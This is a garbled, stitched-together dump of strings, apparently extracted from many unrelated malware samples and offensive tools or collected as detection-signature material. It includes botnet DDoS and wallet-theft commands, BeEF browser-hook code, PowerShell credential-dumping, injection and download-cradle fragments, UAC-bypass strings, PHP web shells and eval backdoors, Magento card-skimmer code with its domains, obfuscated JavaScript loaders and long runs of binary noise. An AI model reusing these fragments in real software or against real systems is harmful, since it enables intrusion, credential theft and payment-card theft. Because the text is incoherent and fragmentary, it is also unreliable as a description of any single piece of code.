http://www.wasabii.com.tw 0'Wymajtec$Tima Stempijg Sarviges GA -$G2AHDNEAFE1.sysSOTEFEHJ3.sysMainSYS64.sys\
%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %uFWPKCLNT.SYSP
%x->%x, icmp type %d, code %d\
Bad packet\
FwpsReferenceNetBufferList0{3ec05b4a-ea88-1378-3389-66706ba27600}master secretMyEngineNetEventCannot execute (%d)SvcNameUsers\\Wool3n.H4t\\C-CPP\\CWoolgerN
oShellLink.Hotkey = \"CTRL+SHIFT+F\"set WshShell = WScript.CreateObject(\"WScript.Shell\")oShellLink.IconLocation = \"notepad.exe, 0\"set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")wlg.datw
[Enter][Control]modules\\exploits\\littletools\\agent_wrapper\\release... get header FATAL ERROR !!!  %d bytes read > header_sizei
connect_back_tcp_channel#do_connect:: Error resolving connect back hostnamekernel32.dll GetProcAddressLoadLibraryAws2_32.dllC
Attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d Encountered error sending syscall response to client/info.datError entering thread lockError exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonAnchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushState({ Be:\"EF\" }window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)window.navigator.userAgent.match(/Avant TriCore/)window.navigator.userAgent.match(/Iceweaselmitb.sniff(Method XMLHttpRequest.open override.browser.hasWebSocket.mitb.poisonFormresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineOpera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsAlina v1.01[0-2])[0-9]
IGFhsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsysti
AppData\\Local\\Temp\\_.net_\\msiexec.exetype:on_execuid:%spriv:%sarch:x%sgend:%scores:%iver:%snet:%s|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s||type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|filesearch.stoprapidgetlayer4.slowlorisrudyddos.war.smartviewftp.upload%s %s :%s LAYER4 Combo Flood: Stopped%s %s :%s IRC War: Flood started [Type: %s | Target: %s]%s %s :%s FTP Upload: FailedAthena v2%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable Rapid HTTP Combo flood on %s:%i for %i secondsBegan flood: %i connections every %i ms to %s:%iIPKiller>AthenaAthena=Shit!Athena-v1BTC wallet.dat file foundMineCraft lastlogin file foundProcess '%s' was found and scheduled for deletion upon next rebootUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)Rapid Connect/DisconnectBTC wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533D9226E4C1CE0A9815DBEB19235AE4X-TS-Rule-Name: %sX-TS-Rule-PatternID: %uX-TS-BotID: %sX-TS-Domain: %sX-TS-SessionID: %sX-TS-Header-Cookie: %SX-TS-Header-Referer: %SX-TS-Header-AcceptEncoding: %SX-TS-Header-AcceptLanguage: %SX-TS-Header-UserAgent: %S_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllU
ShellExecuteExW
SHELL32.dll
GetUserNameExW
Secur32.dll
D19FC0FB14BE23BCF35DA427951BB5AEurl_loader=%Surl_webinjects=%Surl_tokenspy=%Sfile_webinjects=%Smoneyparser.enabled=%uenable_luhn10_post=%uinsidevm_enable=%udisable_antivirus=%ucommand= raw_input(\"Enter command: \").strip('n')print '[-] (Failed to load moduli -- gex will be unsupported.)'print '[-] Listen/bind/accept failed: ' + str(e)chan.send(command)print '[-] SSH negotiation failed.'except paramiko.SSHException, x:&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s%s @ %sUpload KeyLogs
DreatePipeHetSystemDirectoryASeleaseMutexDloseWindowStationDontrolService~hhC2F~.tmp~_MC_3~simpleloginpostdatapostblackrevudpdataantiddosfastddosslowhttpallhttptcpdatadatagetm_ComputerObjectProviderMyWebServicesget_ExecutablePathget_WebServicesMy.WebServicesMy.Userm_UserObjectProviderDelegateCallbackTargetMethod0
uconsolasclUn
info.inipi4izd6vp0.comS
Find_RepeatProcessS
WH_KEYBOARD_LLWSock32.dllWININET.dll\\Chicken\\Release\\svchost.pdb\\IntergrateCHK\\Release\\IntergrateCHK.pdbfake.cf8.8.8.8Processor(%d)\\DbProtectSupportdm1712/`jvpnpkte/bplInstallService NPF %d68961InstallService DbProtectSupport %dC:\\Program Files\\DbProtectSupport\\npf.sysfake.cfgThreadAttack.cppFake.cppdns_arrayDomainRandExcpu %llu %llu %llu %llu[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %sCoded by BRIAN KREBS for personnal use only. I love my job & wife.http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php%BOTID%%BOTNET%bc_removebc_addhttp://www.google.com/webhpCoded by BRIAN KREBS for personal use only. I love my job & wife
zecho -----BEGIN CERTIFICATE----- >echo -----END CERTIFICATE----- >>certutil -decode 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.exePKAcroRd32.exePKSetup=ntdll.exe\x0d\x0aSilent=1\x0d\x0aSetup=%temp%\\AcroRd32.exe\x0d\x0aLeave GetCommand!perform exe success!perform exe failure!Entry SendCommandReq!LeaveDealUpfile!Entry PostData!Leave PostFile!Entry PostFile!\\unknow.zipthe url no respon!Control_RunDLL/cxpid/submit.php?SessionID=/cxgid/E21BC52BEA2FEF26D005CFE21BC52BEA39E435C40CD8                   -,L-,O+,Q-,R-,Y-,S-U
ddos.tf
TCP_KEEPINTVL
TCP_KEEPCNT
Accept-Language: zh%d Kb/bps|%d%%{!}DRZ{!}User-Agent: UploadorSteamAppData.vdfloginusers.vdfconfig.vdfJ
UpdateMutex:response=scanin:UPDATE_BUNISTALL_BS_PROTECTP_WALLETGR_COMMANDFTPUPLOAD-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread Local; ru) Presto/2.10.289 Version/-icmp<xmp>-long99=1X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*Nullsoft
SSFKhttp://xa.xingcloud.com/v4/sof-everything/http://www.mysearch123.com21e223b3f0c97db3c281da1g7zccaefozzjcktmlmaY
RookIE/1.0$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])$enc = Get-PostHashdumpScript$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);Install-SSP -Path .\\mimilib.dll$FinalShellcode.Length@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)$Base64Decoded = [Convert]::FromBase64String($Cpassword)$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recursefunction Get-DecryptedCpassword {$up = Test-Connection -count 1 -Quiet -ComputerName $Computer $out | add-member Noteproperty 'Password' $PasswordExploit-JBoss$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:servicehttp://blog.rvrsh3ll.netRemote URL to your own WARFile to deploy.[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\PowerShellRunner.pdbP
ReflectivePick_x64.dll$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"Invoke-PsExecCmd\"[*] Executing service .EXE$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\# upload to a specified exfil URIServer path to exfil to.[*] PDC: LAB-2008-DC1.lab.com$attempts = Get-UserBadPwdCount $userid $dcs$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000-Dll evil.dll$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAInvoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"Write-Verbose \"[*] Error loading dll\"Write-BytesToMemory -Bytes $Shellcode$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath$Result = sc.exe pause $($TargetService.Name)$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)#Shellcode: CallDllMain.asm$wc.Headers.Add(\"User-Agent\",$script:UserAgent)$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)if ($script:AgentDelay -ne 0){if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))remote DLL injection$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)Test-Port -h $h -p $Port -timeout $Timeout1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }# Get a handle to the module specified$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))$DynAssembly = New-Object 
System.Reflection.AssemblyName('ReflectedDelegate')$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle$Shellcode1 += 0x48$PEHandle = [IntPtr]::Zeroif ($ExeArgs -ne $null -and $ExeArgs -ne '')$ExeArgs = \"ReflectiveExe $ExeArgs\"
D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdbe:\\programs\\LuridDownLoaderLuridDownloader for FalconDllServiceTrojan\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89Madonna\x00Jesus/iupw82/netstatefuckNodAgainiloudermaoCrpq2.cgiClnpp5.cgiDqpq3ll.cgidieosn83.cgiRwpq1.cgi/Ccmwhite/Cmwhite/Crpwhite/Dfwhite/Query.txt/Ufwhite/cgl-bin/Clnpp5.cgi/cgl-bin/Crpq2.cgi/cgl-bin/Dwpq3ll.cgi/cgl-bin/Owpq4.cgi/cgl-bin/Rwpq1.cgi/trandocs/mm//trandocs/netstatNFal.exeLINLINVMAN7NFP4R9WPOWERPNT.exe%APPDATA%\\Microsoft\\Windows\\%HOMEPATH%Server2008Server2003Server2003R2Server2008R2%HOMEDRIVE%%ComSpec%M
iphlpsvc.tmpR
XpsUnregisterServerXpsRegisterServer{53A4988C-F91F-4054-9076-220AC5EC03F3}EEE\x0d\x0aTKE\x0d\x0aVPE\x0d\x0aVPS\x0d\x0aWFSE\x0d\x0aWFSS\x0d\x0aCM**\x0d\x0aT
Win7ElevateV2\\x64\\Release\\R
COMCTL32.dllU
Fubuki.dllCabinet.dll\\UACElevator.pdb%userprofile%\\Downloads\\dwmapi.dll%windir%\\system32\\dwmapi.dllInfection module: %sCould not save module to %s%s%s%p%s%ld%s%d%sStack area around _alloca memory reserved by this function is corruptedStack around the variable 'M
Address: 0xs4u.exe Domain\\Username [Extra SID]\\Release\\s4u.pdbCreateProcessAsUser failed (error %u).GetTokenInformation failed (error: %u).LsaLogonUser failed (error 0x%x).LsaLogonUser: OK, LogonId: 0x%x-0x%xLookupPrivilegeValue failed (error: %u).The token does not have the specified privilege (%S).Unable to parse command line.Unable to find logon SID.AdjustTokenPrivileges failed (error: %u).AdjustTokenPrivileges (%S): OKS
.rsrcHeapFreeConvertStringSidToSidAllocateLocallyUniqueIdADVAPI32.dllLsaLookupAuthenticationPackageMSVCR120.dll\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12Ezcobl\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x12620110113144935bitsadmin /transferdel rm.batav_list=
\\boot.lnk%USERPROFILE%W
\\aapz.tmpC:\\Documents and Settings\\A\\\\Perform\\Release\\Perform.pdbB
\\browser.exee
e!QAZ4rfv:&:-:=:J:O:\\:m:r:6)6/666;6N6W6^6c6t6y6666Q6V6b6g6~60%0,010A0F0K0\\0a0f0w0|06!6(63686E6J6W6\\6i6n6{63 3%33383=3J3R3`3e3o3t3~34 4'40454:4G4M4R4_4e4j4w41#1(141=1B1N1T1Y1e1k1p1|1?(?2?<?C?J?Q?X?_?f?m?t?{??#?*?1?8???F?M?T?[?b?i?p?w?6)6/646@6F6K6W6]6b6n6w6|64#40454:4G4L4Q4^4c4h4u4z4<\"<'<3<8<=<I<N<S<_<d<i<u<z<>%>/>9>@>G>N>U>\\>c>j>q>WTZDAE060>0E0K0P0\\0b0g0v0|04#4-474A4K4U4\\4f4p4z47\"7,767@7J7T7^7h7q7{7;\";';4;E;J;W;k;p;};;0;;;F;Q;\\;g;r;};
5(666Z6c6Wlm;y%UD%d;1;9;@;G;N;U;\\;c;j;q;x;8 8'8.858<8C8J8Q8X8_8f8m8t82 2,282=2B2G2P2U2Z2_2h2s2x24'5.555<5C5J5Q5X5_5f5m5t5{50#0*01080?0F0M0T0[0b0i0p0w06$6,616=6B6G6S6X6]6i6n6s6=\"=)=0=7=>=E=L=S=Z=a=h=6&6-646;6B6I6P6W6^6e6l6s6z6O.QrH@>\">/>4>A>F>S>X>e>j>w>|>0#0(040=0B0N0T0Y0e0k0p0|05)5/545@5F5K5W5`5e5q5w5|5=!=&=3=8=E=N=S=`=e=s=x=}=:(:/:6:=:D:K:R:Y:`:g:n:u:|:7\"727<7F7M7W7a7k7u72+21262E2K2P2\\2h2m2|2;/;5;:;G;V;\\;a;n;};;\";-;8;C;N;^;i;t;
B+P:\\66.666K6S6d6l6}60!0&0+0<0A0F0W0\\0a0n0z0;#;);.;:;@;E;Q;W;\\;h;q;v;2#2-222F2L2W2\\2b2g2x2~29\"9)90979>9E9L9S9Z9k9}96-747;7B7I7P7W7^7e7l7s7z74\"4'43494>4J4P4U4a4g4l4x4:#:(:4:::?:K:T:Y:e:k:p:|:WD.hyA<\"<)<0<7<><E<L<S<Z<a<h<=&=,=1=>=D=I=V=_=d=q=w=|=; ;(;0;8;@;H;P;X;`;h;p;{;<\"<)<0<7<><E<L<S<Z<a<h<o<v<6#6(616;6@6I6S6X6d6n6s6|6(%r-c;u3%3G3N3U3\\3c3j3q3x37\"767T7[7b7i7p7w7~71 1-1>1C1P1a1f1s18 8&8,8A8M8^8d8i8
:%:0:;:F:Q:\\:p:|:6.666>6F6N6V6^6f6n6v6~66!6(6/666=6D6K6R6Y6r6:71t83jL.bjG6!61666V6]6p62%2D2P2`2p2|242494@4G4N4U4\\4c4j4q4x49+92999@9G9N9U9\\9c9j9q9x94!4&43484E4J4W4\\4i4n4s45$5+52595@5G5N5U5\\5c5j5q51.252<2C2J2Q2X2_2f2m2t2{28 8%818:8?8K8Q8V8b8h8m8y89'93989=9B9K9P9U9Z9c9n9s9:\":':,:8:=:B:R:Z:`:e:v:}:=#=(=4=:=?=K=Q=V=b=k=p=|== =*=1=8=?=F=M=T=[=b=i=p=w=~=3&3-343;3B3I3P3W3^3e3l3s3z3:!:(:/:6:=:I:N:S:`:f:k:x:~:cMDkAjy==#=/=4=9=E=J=O=[=`=e=q=v={=
:\":':,:5:=:B:K:P:U:^:c:h:q:v:{:Y@.hdd \\0$0+02090@0G0N0U0\\0c0j0v0{06\"6(6-6:6I6O6T6a6p6v6{61\"1/14191F1K1P1]1b1g1t1y1~10\"0(0-0<0B0G0S0_0d0s0y0~09\"9'959:9?9L9Q9^9c9p9y9~93%3*363=3B3N3T3Y3e3k3p3|34#4)4.4:4C4H4T4Z4_4k4q4v4|&.WTm6#63686E6J6W6\\6i6n6{6;\";(;7;F;W;];f;o;{;0+02080>0B0P0\\0i0|01 1(10181C1N1Y1d1o1z13 3%3*3;3@3E3R3^3c3t3y38\"8)8.8:8?8S8X8f8r8x88$8+82898@8G8N8U8\\89-929?9P9U9b9s9x99*9/9<9A9N9T9`9e9r9w92-292?2G2N2U2\\2c2j2q29u
uOh4XC
yDYYVV
D$(hDtC
GDh\aC
u6hLXC
L$LQWPV
:$:+:2:9:@:G:N:U:\\:s:6%6+606<6H6M6\\6b6g6v6}68\"8,818;8@8J8O8Y8^8h8m8w86 6'6.656<6C6J6Q6X6_6f6m6t64\"4)40474>4E4L4S4Z4a4h49\"9+91969?9E9J9S9\\9a9j9p9u9~99\"9'91999C9H9R9W9a9f9p9u94\"4(4-4<4B4G4S4_4d4s4y4~46\"6'6,6=6B6G6X6]6b6o6{6?\"?/?4?B?G?L?Y?^?k?p?}?3)31383>3C3L3R3W3c3i3n3w3}3;&;+;5;:;D;I;S;X;b;j;t;y;='=,=6=>=H=M=W=\\=a=m=r=w=:!:*:/:9:>:H:P:Z:_:i:n:x:}:3$3.383B3L3S3Z3a3h3o3v3}3<$<.<3<=<B<L<Q<^<c<m<r<|<31383?3F3M3T3[3b3i3p3w3~39!9(9/969=9D9K9R9Y9`9g9n9x9:$:*:/:8:>:C:L:U:Z:c:i:n:w:|:
SSWWWV
P@YYY_^
P@YYQP
D$4Wh@GD
Attempting to create more than one keyboard::Monitor instance{Right windows}Access violation - no RTTI data!
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)\" target=\"NewRef\"></a>c
OPERA.EXE
n%d (!=0),user/pass auth will not work, ignored.\n/etc/TZ,M4.1.0,M10.5.0%u.%u.%u.%u.in-addr.arpaGET /r/sr.arm5 HTTP/1.0NIF\nANSI_CHARSET][Vee_d_[qfcD:6<%-%/%1%3%5%7%9%;%imhzxsc\\WWKD<.)wVzlarf\\]VOZVMskfJKWFAp\\Z<aLLwhgbdLeftToRightF/.pTC7O><8,)-$ mjeUB>D.'8)5\\\\vhe[JGiVRk[W]PL(zwWNNG:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plG
%USERPROFILE%\\IEXPL0RE.EXE\"<770j ((\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXELoaderV5.dllPOST /index%0.9d.asp HTTP/1.1GET /search?n=%0.9d&DUDE_AM_I_SHARP-3.14159265358979x6.626176WHO_A_R_E_YOU?2.99792458x1.25663706143592BASTARD_&&_BITCHES_%0.8xc:\\bbb\\eee.txt
/.md/cgi-mac/xnocz1checkvir.plist/Users/apple/Documents/mac backiMuler2/Users/imac/Desktop/macback/xntaskz.gz2wmsetstatus.cgilaunch-0rp.dat2wmupload.cgixntmpz2wmrecvdata.cgixnorz62wmdelfile.cgi/LanchAgents/checkvir0PERA:%s/tmp/Spotlight/tmp/launch-ICS000
XTALKER7Insta11 MicrosoftwudMessageECD4FC4D-521C-11D0-B792-00A0C90312E1B12AE898-D056-4378-A844-6D393FE37956LoadSTRINGInitializeKeyHookFindResourcesLoadSTRINGFromHKCUhccutils.DLLH:\Fast\Plug(hkcmd)\dll\Release\HijackDll.pdb4673SeCreateGlobalPrivilegeWindows\\System32\\sysprep\\sysprep.exeNetwork Access Management Agents }
tid=%d&ta=%s-%xfid=%d%[^.].%[^(](%[^)])%s [%s %d] 77 %sGlobal\\%s%xInject::InjectProcessByName()Inject::CopyImageToProcess()Inject::InjectProcess()Inject::InjectImageToProcess()Drop::InjectStartThread()ExploitMS10_092\\globalroot\\systemroot\\system32\\tasks\\<RunLevel>HighestAvailable</RunLevel>v
bisonal
%s\\rundll32.exe \"%s\", ShadowPlaynvdisps.dll%snvdisps.dll\\winhlp32.exenvdisps_user.dat%snvdisps_user.datProgramData\\RasTls\\RasTls.exeProgramData\\RasTls\\rundll32.exeProgramData\\RasTls\\svchost.exeWindows\\System32\\regsvr32.exe4689Windows\\System32\\mshta.exeWindows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeWindows\\System32\\wbem\\WmiPrvSE.exe%s=?getname&COMPUTER=^xJWFwcGRhdGElAA=JVdJTkRJUibtcplugPsExec.exeWindows\\System32\\net.exeWindows\\System32\\at.exeInvalid key length used to initialize BlowFish.GetPCProxyHandlerStartPCProxySetPCProxyHandler
ELFStatus: OK--scryptstratum+tcp://cmd.so/Challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sEDIT_SERVER
/h.gHTTPHeadGet/Library/launchedMy connect error with no ip!Send File is Failed****************************You Have got it!****************************TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjETW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==[\"cookie\",\"\"realauth=\"location\"];d3RmZXhlinclude '../../../../../../../../../../app/Mage.php'; Mage::app(); $q = Mage::getModel('sales/quote_payment')->getCollection();../../../../../../app/Mage.php'; Mage::app(); var_dump(Mage::getModel('sales/order')rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9base64_decode('b25lcGFnZXxnY19hZG1pbg==')DNEcHdQbWtXU3dSMDA1VmZ1c29WUVFXdUhPT0xYb0k3ZDJyWmFVZlF5Y0ZEeHV4K2FnVmY0OUtjbzhnc0U3hkTVVibSt2MTgyRjY0VmZlQWo3d1VlaFJVNVNnSGZUVUhKZXdEbGxJUTlXWWlqWSt0cEtacUZOSXF4crb2JHaTJVdURMNlhQZ1ZlTGVjVnFobVdnMk5nbDlvbEdBQVZKRzJ1WmZUSjdVOWNwWURZYlZ0L1BtNCteval(base64_decode($_POSTeval($undecode($tongji))<strong>WwW.Zone-Org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_REQUEST['eval(xxtea_decrypt** Scam Redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
fopen(\"cache.php\", \"w+\")0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.jsif(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}echo \"IndoXploit - Auto Xploiter\"eval(base64_decode($a));(preg_match('/\\/admin\\/Cms_Wysiwyg\\/directive\\/index\\//', $_SERVER['REQUEST_URI']))eval(gzinflate(base64_decode(str_rot13(strrev(attribute_code=0x70617373776f72645f68617368))unlink('../media/catalog/category/'.basename($if(isset($_GET['do'])){$g0='adminhtml/default/default/images'stripos($buf, 'Visbot')!==false && stripos($buf, 'Pong')!==falsestripos($buf, 'Visbot') !== false && stripos($buf, 'Pong')<?PHP /*** Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php**/$$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_COOKIE[qz])==($_=@$_REQUEST[q]).@$_($_REQUEST[z]);@eval(stripslashes($_REQUEST[q]));$log_entry = serialize($ARINFO)curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 
\".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"FILE_Bad\");\\x6F\\x6E\\x65\\x70\\x61\\x67\\x65\\x7C\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1Blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6D\\x61\\x67\\x65\\x2D\\x63\\x64\\x6E\\x2E\\x6C\\x69\\x6E\\x6BRegExp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3boxz=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|RegExp|onepage|checkout|grelos_v= 
null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_POST['upload'])php_uname()lastc0de@Outlook.comCodersLeetAgencyCaFcKapaljetz666X-PHP-ScriptX-PHP-Originating-Script/usr/bin/php.jseW[ZZQW@41g.1p4\@@D;%:
\{g`.41g.1p
Uwwqd`.4>;>
W{z`qz`9@mdq.4`ql`;|`yx
Df{lm9W{zzqw`}{z.4_qqd9Ux}bq
W{z`qz`9xqzs`|.4$
HDllCanLoadNowPxxWuzX{upZ{cZayvqf4{r4gav
qmg.41pJXNcc2hlbGxcb3Blblxjb21tYW5k^LZww&|xvSlwv'Vxvxl~v&%`MC!
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==GQRGFRpVA
